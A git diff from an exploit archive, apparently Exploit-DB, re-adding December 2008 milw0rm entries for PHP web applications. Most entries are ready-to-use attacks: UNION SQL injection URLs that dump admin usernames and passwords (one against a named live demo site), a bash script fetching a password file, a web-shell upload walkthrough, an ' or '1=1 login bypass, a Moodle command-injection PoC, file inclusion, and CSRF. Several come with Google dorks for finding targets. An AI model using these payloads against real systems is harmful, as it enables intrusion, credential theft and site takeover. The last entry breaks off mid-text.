@@ -1,33 +1,33 @@ -[â– ] Xpoze Pro (home menù) <= Blind $ql Injection - - ->---------------------------------------< - -> AuToR: XaDoS (SecurityCode Team) -> Contact M&: xados [at] hotmail [dot] it -> B§g: Blind $ql inJection -> SIte vuln: http://www.xpoze.org/ - ->---------------------------------------< - - -[â– ] ExPL0iT: - -Dork: " Powered by Xpoze " - -|: http://www.example.com/home.html?menu=[$qL] - - -[â– ] D£M0: - -|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5 [NO°°] - -|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] - - - -[â– ] Th4nKs:: - -\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie ) - -# milw0rm.com [2008-12-12] +[â– ] Xpoze Pro (home menù) <= Blind $ql Injection + + +>---------------------------------------< + +> AuToR: XaDoS (SecurityCode Team) +> Contact M&: xados [at] hotmail [dot] it +> B§g: Blind $ql inJection +> SIte vuln: http://www.xpoze.org/ + +>---------------------------------------< + + +[â– ] ExPL0iT: + +Dork: " Powered by Xpoze " + +|: http://www.example.com/home.html?menu=[$qL] + + +[â– ] D£M0: + +|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5 [NO°°] + +|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] + + + +[â– ] Th4nKs:: + +\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie ) + +# milw0rm.com [2008-12-12] diff --git a/platforms/php/webapps/7433.txt b/platforms/php/webapps/7433.txt index 8470db13c..2d42b191e 100755 --- a/platforms/php/webapps/7433.txt +++ b/platforms/php/webapps/7433.txt 
@@ -1,54 +1,54 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<<!>> Found by : Cyb3r-1sT - -<<!>> C0ntact : cyb3r-1st [at] hotmail.com - -<<!>> Groups : InjEctOr5 T3am - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - - -<<->> script : Social Groupie - -<<->> download : www.socialgroupie.com - - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>> - - :>> http://www.site.me/group_index.php?id=-1067+Union+select+0,0,0,0,0,0,0,0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+tbl_admin-- - - - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ -======================================================= - -<<->> All freinds , all muslims , str0ke - -# milw0rm.com [2008-12-12] + + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<<!>> Found by : Cyb3r-1sT + +<<!>> C0ntact : cyb3r-1st [at] hotmail.com + +<<!>> Groups : InjEctOr5 T3am + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + + +<<->> script : Social Groupie + +<<->> download : www.socialgroupie.com + + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>> + + :>> http://www.site.me/group_index.php?id=-1067+Union+select+0,0,0,0,0,0,0,0,0,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+tbl_admin-- + + + +======================================================= +++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ +======================================================= + +<<->> All freinds , all muslims , str0ke + +# milw0rm.com [2008-12-12] diff --git a/platforms/php/webapps/7434.sh b/platforms/php/webapps/7434.sh index 48acf270d..f75c38ee1 100755 --- a/platforms/php/webapps/7434.sh +++ b/platforms/php/webapps/7434.sh 
@@ -1,19 +1,19 @@
-#!/bin/bash
-# Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
-# by athos - staker[at]hotmail[dot]it
-
-host=$1;
-name=$2;
-path='/config/passwd.txt';
-
-if [ "$name" = "" ]; then
- echo "Usage: bash $0 [host/path] [filename]";
- echo "by athos - staker[at]hotmail[dot]it";
- exit;
-fi;
-
-curl $host/$path > $name;
-clear
-cat $name;
-
-# milw0rm.com [2008-12-12]
+#!/bin/bash
+# Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
+# by athos - staker[at]hotmail[dot]it
+
+host=$1;
+name=$2;
+path='/config/passwd.txt';
+
+if [ "$name" = "" ]; then
+ echo "Usage: bash $0 [host/path] [filename]";
+ echo "by athos - staker[at]hotmail[dot]it";
+ exit;
+fi;
+
+curl $host/$path > $name;
+clear
+cat $name;
+
+# milw0rm.com [2008-12-12]
diff --git a/platforms/php/webapps/7435.txt b/platforms/php/webapps/7435.txt
index e6a4d61f7..fa794993f 100755
--- a/platforms/php/webapps/7435.txt
+++ b/platforms/php/webapps/7435.txt
@@ -1,56 +1,56 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<<!>> Found by : Cyb3r-1sT - -<<!>> C0ntact : cyb3r-1st [at] hotmail.com - -<<!>> Groups : InjEctOr5 T3am - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - - -<<->> script : Social Groupie - -<<->> download : www.socialgroupie.com - - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>> After u Register in site flow this steps - - Step 1 :> Goto photos section : http://www.site.me/Photos/photos.php - - Step 2 :> Create new album : http://www.site.me/Photos/create_album.php - - Step 3 :> Upload ur shell as ( shell.jpg.php Or shell.php ) .. Ur shell will be here http://www.site.me/Member_images/ - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ -======================================================= - -<<->> All freinds , all muslims , str0ke - -# milw0rm.com [2008-12-12] + + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<<!>> Found by : Cyb3r-1sT + +<<!>> C0ntact : cyb3r-1st [at] hotmail.com + +<<!>> Groups : InjEctOr5 T3am + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + + +<<->> script : Social Groupie + +<<->> download : www.socialgroupie.com + + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>> After u Register in site flow this steps + + Step 1 :> Goto photos section : http://www.site.me/Photos/photos.php + + Step 2 :> Create new album : http://www.site.me/Photos/create_album.php + + Step 3 :> Upload ur shell as ( shell.jpg.php Or shell.php ) .. Ur shell will be here http://www.site.me/Member_images/ + +======================================================= +++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ +======================================================= + +<<->> All freinds , all muslims , str0ke + +# milw0rm.com [2008-12-12] diff --git a/platforms/php/webapps/7437.txt b/platforms/php/webapps/7437.txt index b1c746d88..f7a243f14 100755 --- a/platforms/php/webapps/7437.txt +++ b/platforms/php/webapps/7437.txt 
@@ -1,154 +1,154 @@ -Moodle 1.9.3 Remote Code Execution - -Name Remote Code Execution in Moodle -Systems Affected Moodle 1.9.3 and possibly earlier versions -Severity High -Impact (CVSSv2) High 7.3/10, vector: (AV:N/AC:L/Au:M/C:P/I:P/A:C) -Vendor http://moodle.org/ -Advisory http://www.ush.it/team/ush/hack-moodle193/moodle193.txt -Authors Antonio "s4tan" Parata (s4tan AT ush DOT it) - Francesco "ascii" Ongaro (ascii AT ush DOT it) - Giovanni "evilaliv3" Pellerano (evilaliv3 AT - digitalbullets DOT org) -Date 20081212 - -I. BACKGROUND - ->From the Moodle web site: "Moodle is a course management system (CMS) - -a free, Open Source software package designed using sound pedagogical -principles, to help educators create effective online learning -communities". - -II. DESCRIPTION - -A Remote Code Execution exists in Moodle 1.9.3. - -III. ANALYSIS - -- Remote Code Execution (RCE) in texed.php (pathname parameter) - -A Remote Code Execution (RCE) vulnerability has been found in -filter/tex/texed.php. In order to exploit this vulnerability -register_globals must be enabled as the "TeX Notation" filter. - -All these conditions reduce the impact of the vulnerability, to remark -this fact we have set "multiple authentication" flag in the cvss2 score). 
- -In texed.php we find the following instructions: - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -$cmd = tex_filter_get_cmd($pathname, $texexp); -system($cmd, $status); - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -Where the function "tex_filter_get_cmd", defined in lib.php, is the -following: - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -function tex_filter_get_cmd($pathname, $texexp) { - $texexp = escapeshellarg($texexp); - $executable = tex_filter_get_executable(false); - - if ((PHP_OS == "WINNT") || (PHP_OS == "WIN32") || (PHP_OS == -"Windows")) { - $executable = str_replace(' ', '^ ', $executable); - return "$executable ++ -e \"$pathname\" -- $texexp"; - - } else { - return "\"$executable\" -e \"$pathname\" -- $texexp"; - } -} - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -As we can see no check is performed on the "$pathname" parameter neither -in "texed.php" neither in the "tex_filter_get_cmd" function declared in -"lib.php". - -Seen this it's possible to exploit this vulnerability to execute -arbitrary commands on the target server. The following urls are proof -of concept for Linux and Windows: - -On Linux: -http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;echo+" - -On Windows: -http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+dir+||+echo+ - -This RCE is "blind". You'll never see the list dir of the example -because there is no print of the system command output. - -IV. DETECTION - -Moodle 1.9.3 and possibly earlier versions are vulnerable. - -V. WORKAROUND - -Proper input validation will fix the vulnerabilities. Actually the -vulnerability is fixed in the Dev tree. - -Upgrade to latest development version. - -VI. 
VENDOR RESPONSE - -Vendor will not release a new version addressing this vulnerability -since moodle has several different issues with register globals and -the vendor decided to resolve them in a different way for the upcoming -versions. - -"At present we are working on changes that will prevent installation when -register globals on. They should be committed later this week. I suppose -we are not going to release 1.9.4 now because register globals issue is -a know problem already." - -VII. CVE INFORMATION - -No CVE at this time. - -VIII. DISCLOSURE TIMELINE - -20080121 Bug discovered -20081111 Initial vendor contact (No Response) -20081811 Second vendor contact (No Response) -20081811 Vendor response -20081212 Advisory released (Fix available only in dev tree) - -IX. CREDIT - -Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni -"evilaliv3" Pellerano are credited with the discovery of this -vulnerability. - -Antonio "s4tan" Parata -web site: http://www.ictsc.it/ -mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it - -Francesco "ascii" Ongaro -web site: http://www.ush.it/ -mail: ascii AT ush DOT it - -Giovanni "evilaliv3" Pellerano -mail: evilaliv3 AT digitalbullets DOT it - -X. LEGAL NOTICES - -Copyright (c) 2008 Francesco "ascii" Ongaro - -Permission is granted for the redistribution of this alert -electronically. It may not be edited in any way without mine express -written consent. If you wish to reprint the whole or any -part of this alert in any other medium other than electronically, -please email me for permission. - -Disclaimer: The information in the advisory is believed to be accurate -at the time of publishing based on currently available information. Use -of the information constitutes acceptance for use in an AS IS condition. -There are no warranties with regard to this information. 
Neither the -author nor the publisher accepts any liability for any direct, indirect, -or consequential loss or damage arising from use of, or reliance on, -this information. - -# milw0rm.com [2008-12-12] +Moodle 1.9.3 Remote Code Execution + +Name Remote Code Execution in Moodle +Systems Affected Moodle 1.9.3 and possibly earlier versions +Severity High +Impact (CVSSv2) High 7.3/10, vector: (AV:N/AC:L/Au:M/C:P/I:P/A:C) +Vendor http://moodle.org/ +Advisory http://www.ush.it/team/ush/hack-moodle193/moodle193.txt +Authors Antonio "s4tan" Parata (s4tan AT ush DOT it) + Francesco "ascii" Ongaro (ascii AT ush DOT it) + Giovanni "evilaliv3" Pellerano (evilaliv3 AT + digitalbullets DOT org) +Date 20081212 + +I. BACKGROUND + +>From the Moodle web site: "Moodle is a course management system (CMS) - +a free, Open Source software package designed using sound pedagogical +principles, to help educators create effective online learning +communities". + +II. DESCRIPTION + +A Remote Code Execution exists in Moodle 1.9.3. + +III. ANALYSIS + +- Remote Code Execution (RCE) in texed.php (pathname parameter) + +A Remote Code Execution (RCE) vulnerability has been found in +filter/tex/texed.php. In order to exploit this vulnerability +register_globals must be enabled as the "TeX Notation" filter. + +All these conditions reduce the impact of the vulnerability, to remark +this fact we have set "multiple authentication" flag in the cvss2 score). 
+ +In texed.php we find the following instructions: + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +$cmd = tex_filter_get_cmd($pathname, $texexp); +system($cmd, $status); + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +Where the function "tex_filter_get_cmd", defined in lib.php, is the +following: + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +function tex_filter_get_cmd($pathname, $texexp) { + $texexp = escapeshellarg($texexp); + $executable = tex_filter_get_executable(false); + + if ((PHP_OS == "WINNT") || (PHP_OS == "WIN32") || (PHP_OS == +"Windows")) { + $executable = str_replace(' ', '^ ', $executable); + return "$executable ++ -e \"$pathname\" -- $texexp"; + + } else { + return "\"$executable\" -e \"$pathname\" -- $texexp"; + } +} + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +As we can see no check is performed on the "$pathname" parameter neither +in "texed.php" neither in the "tex_filter_get_cmd" function declared in +"lib.php". + +Seen this it's possible to exploit this vulnerability to execute +arbitrary commands on the target server. The following urls are proof +of concept for Linux and Windows: + +On Linux: +http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;echo+" + +On Windows: +http://www.example.com/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+dir+||+echo+ + +This RCE is "blind". You'll never see the list dir of the example +because there is no print of the system command output. + +IV. DETECTION + +Moodle 1.9.3 and possibly earlier versions are vulnerable. + +V. WORKAROUND + +Proper input validation will fix the vulnerabilities. Actually the +vulnerability is fixed in the Dev tree. + +Upgrade to latest development version. + +VI. 
VENDOR RESPONSE + +Vendor will not release a new version addressing this vulnerability +since moodle has several different issues with register globals and +the vendor decided to resolve them in a different way for the upcoming +versions. + +"At present we are working on changes that will prevent installation when +register globals on. They should be committed later this week. I suppose +we are not going to release 1.9.4 now because register globals issue is +a know problem already." + +VII. CVE INFORMATION + +No CVE at this time. + +VIII. DISCLOSURE TIMELINE + +20080121 Bug discovered +20081111 Initial vendor contact (No Response) +20081811 Second vendor contact (No Response) +20081811 Vendor response +20081212 Advisory released (Fix available only in dev tree) + +IX. CREDIT + +Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni +"evilaliv3" Pellerano are credited with the discovery of this +vulnerability. + +Antonio "s4tan" Parata +web site: http://www.ictsc.it/ +mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it + +Francesco "ascii" Ongaro +web site: http://www.ush.it/ +mail: ascii AT ush DOT it + +Giovanni "evilaliv3" Pellerano +mail: evilaliv3 AT digitalbullets DOT it + +X. LEGAL NOTICES + +Copyright (c) 2008 Francesco "ascii" Ongaro + +Permission is granted for the redistribution of this alert +electronically. It may not be edited in any way without mine express +written consent. If you wish to reprint the whole or any +part of this alert in any other medium other than electronically, +please email me for permission. + +Disclaimer: The information in the advisory is believed to be accurate +at the time of publishing based on currently available information. Use +of the information constitutes acceptance for use in an AS IS condition. +There are no warranties with regard to this information. 
Neither the +author nor the publisher accepts any liability for any direct, indirect, +or consequential loss or damage arising from use of, or reliance on, +this information. + +# milw0rm.com [2008-12-12] diff --git a/platforms/php/webapps/7439.txt b/platforms/php/webapps/7439.txt index a67d2156d..889f005c3 100755 --- a/platforms/php/webapps/7439.txt +++ b/platforms/php/webapps/7439.txt 
@@ -1,59 +1,59 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<<!>> Found by : Fisher - -<<!>> C0ntact : sq7@w.cn - -<<!>> Groups : InjEctOr5 T3am - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - - -<<->> script : Songs Portal - -<<->> download : www.umerinc.com/songs_portal.php - - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : ;) - -<<->> Exploit :>>> - - :>> http://www.site.com/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin-- - - - - Demo : - - http://www.umerinc.com/portfolio/aamir/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin-- - - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ -======================================================= - -<<->> HCJ,Sniper_Net,broken security ,Cyb3r-1sT & all friends - -# milw0rm.com [2008-12-12] + + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<<!>> Found by : Fisher + +<<!>> C0ntact : sq7@w.cn + +<<!>> Groups : InjEctOr5 T3am + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + + +<<->> script : Songs Portal + +<<->> download : www.umerinc.com/songs_portal.php + + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : ;) + +<<->> Exploit :>>> + + :>> http://www.site.com/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin-- + + + + Demo : + + http://www.umerinc.com/portfolio/aamir/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin-- + + +======================================================= +++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ +======================================================= + +<<->> HCJ,Sniper_Net,broken security ,Cyb3r-1sT & all friends + +# milw0rm.com [2008-12-12] diff --git a/platforms/php/webapps/7441.txt b/platforms/php/webapps/7441.txt index 40d64aca4..20e66cdb8 100755 --- a/platforms/php/webapps/7441.txt +++ b/platforms/php/webapps/7441.txt 
@@ -1,28 +1,28 @@ -Joomla Live Chat - -http://www.joompolitan.com/livechat.html - -Google Dork: allinurl:option=com_livechat - -author: jdc - - -SQL Injections: - -administrator/components/com_livechat/getChat.php && administrator/components/com_livechat/getSavedChatRooms.php don't sanitize the variable 'last': - - -$last = (isset($_GET['last']) && $_GET['last'] != '') ? $_GET['last'] : 0; ---------------------------------------------------------^ - -administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users - -administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users - - -Open Proxy ( sends HTTP_FORWARDED ): - -administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com - - -# milw0rm.com [2008-12-12] +Joomla Live Chat + +http://www.joompolitan.com/livechat.html + +Google Dork: allinurl:option=com_livechat + +author: jdc + + +SQL Injections: + +administrator/components/com_livechat/getChat.php && administrator/components/com_livechat/getSavedChatRooms.php don't sanitize the variable 'last': + + +$last = (isset($_GET['last']) && $_GET['last'] != '') ? $_GET['last'] : 0; +--------------------------------------------------------^ + +administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users + +administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users + + +Open Proxy ( sends HTTP_FORWARDED ): + +administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com + + +# milw0rm.com [2008-12-12] diff --git a/platforms/php/webapps/7443.txt b/platforms/php/webapps/7443.txt index 430a4e2cd..f60717246 100755 --- a/platforms/php/webapps/7443.txt 
+++ b/platforms/php/webapps/7443.txt 
@@ -1,41 +1,41 @@ -[START] - -######################################################################################### -[0x01] Informations: - -Script : FlexPHPNews PRO 0.0.6 -Script : FlexPHPNews 0.0.6 -Download : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1 [0.0.6 Pro] -Download : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1 [0.0.6] -Vulnerability : Sql Injection (Auth bypass) -Author : Osirys -Contact : osirys[at]live[dot]it -Notes : Proud to be Italian -Greets: : XaDoS, x0r, emgent, Jay, str0ke - -######################################################################################### -[0x02] Bug:[Sql Injection (Auth bypass)] -###### - -Bugged file is: /[path]/admin/usercheck.php - -[CODE] - -if (!empty($logincheck)){ -$sql = "select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'"; -$results = $db->select($sql); - -[/CODE] - - -[!] EXPLOIT DETAILS: - - [1] Go to /[path]/admin/index.php - [2] Put as username and password the following sql code: ' or '1=1 - [3] You are the admin now, bypass succesfull =) - -######################################################################################### - -[/END] - -# milw0rm.com [2008-12-14] +[START] + +######################################################################################### +[0x01] Informations: + +Script : FlexPHPNews PRO 0.0.6 +Script : FlexPHPNews 0.0.6 +Download : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1 [0.0.6 Pro] +Download : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1 [0.0.6] +Vulnerability : Sql Injection (Auth bypass) +Author : Osirys +Contact : osirys[at]live[dot]it +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke + +######################################################################################### +[0x02] Bug:[Sql Injection (Auth bypass)] +###### + +Bugged file is: /[path]/admin/usercheck.php + +[CODE] + +if (!empty($logincheck)){ +$sql = 
"select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'"; +$results = $db->select($sql); + +[/CODE] + + +[!] EXPLOIT DETAILS: + + [1] Go to /[path]/admin/index.php + [2] Put as username and password the following sql code: ' or '1=1 + [3] You are the admin now, bypass succesfull =) + +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-14] diff --git a/platforms/php/webapps/7448.txt b/platforms/php/webapps/7448.txt index 465d8ec18..8ca617fae 100755 --- a/platforms/php/webapps/7448.txt +++ b/platforms/php/webapps/7448.txt 
@@ -1,60 +1,60 @@ -############################################################################################ -[+] AutositePHP v2.0.3 (LFI/CSRF/Edit File) Multiple Remote Vulnerabilities -[+] Discovered By SirGod -[+] Greetz : All my friends -[+] Download Script : http://sourceforge.net/projects/autositephp/ -############################################################################################ - -[+] Local File Inclusion - - PoC 1 : - - http://[target]/[path]/index.php?page=users/[Local File] - - Example 1 : - - http://127.0.0.1/path/index.php?page=users/../../../../boot.ini - - - PoC 2 : - - http://[target]/[path]/index.php?page=users/login.php&update=update/[Local -File] - - Example 1 : - - http://127.0.0.1/path/index.php?page=users/login.php&update=update/../../../../boot.ini - - -[+] Edit File - - - Need administrative permissions.You can edit files from the webserver. - - PoC : - - http://[target]/[path]/pages/Admin/File%20Editor/actions/modify.php?page=pages/[Local -File] - - Example : - - http://127.0.0.1/path/pages/Admin/File%20Editor/actions/modify.php?page=pages/../../../../boot.ini - - -[+] Cross Site Request Forgery - - - If a logged in user with administrator privileges clicks on the -following url : - - http://127.0.0.1/path/index.php?page=pages/Admin/Users/viewusers/delete.php&username=SirGod&submit=submit - - The username SirGod will be deleted.You can change the username to another. - - http://127.0.0.1/path/index.php?page=pages/Admin/Users/viewusers/delete.php&username=[USERNAME]&submit=submit - -[USERNAME] = name of account that you want to delete. 
